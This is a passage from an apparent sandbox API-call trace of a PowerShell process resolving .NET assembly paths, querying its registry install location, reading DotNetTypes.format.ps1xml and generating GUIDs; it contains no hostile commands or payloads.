lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.717] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.718] GetLastError () returned 0x0 [0052.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.718] GetLastError () returned 0x0 [0052.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0052.719] GetLastError () returned 0x0 [0052.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0052.720] GetLastError () returned 0x57 [0052.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0052.727] GetLastError () returned 0x57 [0052.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.733] GetLastError () returned 0x57 [0052.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0052.739] GetLastError () returned 0x57 [0052.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0052.742] GetLastError () returned 0x57 [0052.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0052.744] GetLastError () returned 0x57 [0052.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0052.745] GetLastError () returned 0x57 [0052.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0052.746] GetLastError () returned 0x57 [0052.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0052.748] GetLastError () returned 0x57 [0052.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0052.749] GetLastError () returned 0x57 [0052.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0052.750] GetLastError () returned 0x57 [0052.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0052.751] GetLastError () returned 0x57 [0052.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0052.752] GetLastError () returned 0x57 [0052.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0052.760] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.761] GetLastError () returned 0x57 [0052.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.762] GetLastError () returned 0x57 [0052.808] VirtualQuery (in: lpAddress=0x14d6c0, lpBuffer=0x14e6c0, dwLength=0x1c | out: lpBuffer=0x14e6c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.810] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd286b4dd, Data2=0x6f55, Data3=0x428e, Data4=([0]=0x8b, [1]=0x94, [2]=0xb5, [3]=0x2a, [4]=0xe8, [5]=0x60, [6]=0x6a, [7]=0x39))) returned 0x0 [0052.810] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe84d095c, Data2=0x2590, Data3=0x415a, Data4=([0]=0xb4, [1]=0x34, [2]=0xcd, [3]=0xb0, [4]=0xe9, [5]=0x83, [6]=0x16, [7]=0x1c))) returned 0x0 [0052.811] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.811] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.811] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd76502e5, Data2=0xa3a9, Data3=0x4602, Data4=([0]=0xb5, [1]=0x21, [2]=0x79, [3]=0x40, [4]=0x4d, [5]=0xc8, [6]=0x47, [7]=0xcf))) returned 0x0 [0052.812] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7bdc91de, Data2=0xed2c, Data3=0x45a7, Data4=([0]=0xa4, [1]=0x5a, [2]=0xa0, [3]=0xdf, [4]=0xa2, [5]=0xc7, [6]=0xda, [7]=0x62))) returned 0x0 [0052.812] VirtualQuery (in: lpAddress=0x14d864, lpBuffer=0x14e864, dwLength=0x1c | out: lpBuffer=0x14e864*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.812] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.812] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.813] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6c4281a6, Data2=0x9a79, Data3=0x4e05, Data4=([0]=0x89, [1]=0xf9, [2]=0x98, [3]=0xb1, [4]=0x6c, [5]=0x82, [6]=0x95, [7]=0xd0))) returned 0x0 [0052.813] VirtualQuery (in: lpAddress=0x14d864, lpBuffer=0x14e864, dwLength=0x1c | out: lpBuffer=0x14e864*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.813] VirtualQuery (in: lpAddress=0x14d77c, lpBuffer=0x14e77c, dwLength=0x1c | out: lpBuffer=0x14e77c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.814] VirtualQuery (in: lpAddress=0x14d430, lpBuffer=0x14e430, dwLength=0x1c | out: lpBuffer=0x14e430*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.814] VirtualQuery (in: lpAddress=0x14d430, lpBuffer=0x14e430, dwLength=0x1c | out: lpBuffer=0x14e430*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.814] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9e963ec, Data2=0x8f21, Data3=0x46ee, Data4=([0]=0x93, [1]=0xaa, [2]=0x93, [3]=0x92, [4]=0xcb, [5]=0x2f, [6]=0x70, [7]=0xac))) returned 0x0 [0052.814] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x5440d795, Data2=0xb53e, Data3=0x4b9b, Data4=([0]=0xa2, [1]=0x3a, [2]=0x16, [3]=0xa8, [4]=0xf2, [5]=0xbe, [6]=0x1e, [7]=0xd9))) returned 0x0 [0052.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.814] GetLastError () returned 0x57 [0052.814] SetErrorMode (uMode=0x1) returned 0x1 [0052.814] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.814] GetLastError () returned 0x0 [0052.814] GetFileType (hFile=0x2f8) returned 0x1 [0052.814] SetErrorMode (uMode=0x1) returned 0x1 [0052.815] GetFileType (hFile=0x2f8) returned 0x1 [0052.815] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.817] GetLastError () returned 0x0 [0052.817] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.817] GetLastError () returned 0x0 [0052.817] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.819] GetLastError () returned 0x0 [0052.819] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.819] GetLastError () returned 0x0 [0052.819] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.819] GetLastError () returned 0x0 [0052.819] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.819] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.822] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0xbce, lpOverlapped=0x0) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419542, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419542*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] CloseHandle (hObject=0x2f8) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.822] GetLastError () returned 0x0 [0052.822] SetErrorMode (uMode=0x1) returned 0x1 [0052.822] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x243add0 | out: lpFileInformation=0x243add0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0052.822] GetLastError () returned 0x0 [0052.822] SetErrorMode (uMode=0x1) returned 0x1 [0052.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.822] GetLastError () returned 0x0 [0052.822] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.823] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.823] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.823] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.823] GetLastError () returned 0x0 [0052.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.823] GetLastError () returned 0x0 [0052.825] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf339be39, Data2=0x16d8, Data3=0x4240, Data4=([0]=0x86, [1]=0x6d, [2]=0x73, [3]=0x39, [4]=0x9f, [5]=0x99, [6]=0x9c, [7]=0x8b))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x5478bff3, Data2=0xa333, Data3=0x4c60, Data4=([0]=0x93, [1]=0xb1, [2]=0xb5, [3]=0x1, [4]=0x78, [5]=0xce, [6]=0x44, [7]=0x9f))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x4cf7ef82, Data2=0xd8f8, Data3=0x43ca, Data4=([0]=0x91, [1]=0x16, [2]=0xca, [3]=0x3f, [4]=0x5f, [5]=0x30, [6]=0xa, [7]=0xca))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xfe24e7a8, Data2=0xb04f, Data3=0x4af1, Data4=([0]=0x9e, [1]=0x11, [2]=0xc5, [3]=0x27, [4]=0x47, [5]=0x11, [6]=0x13, 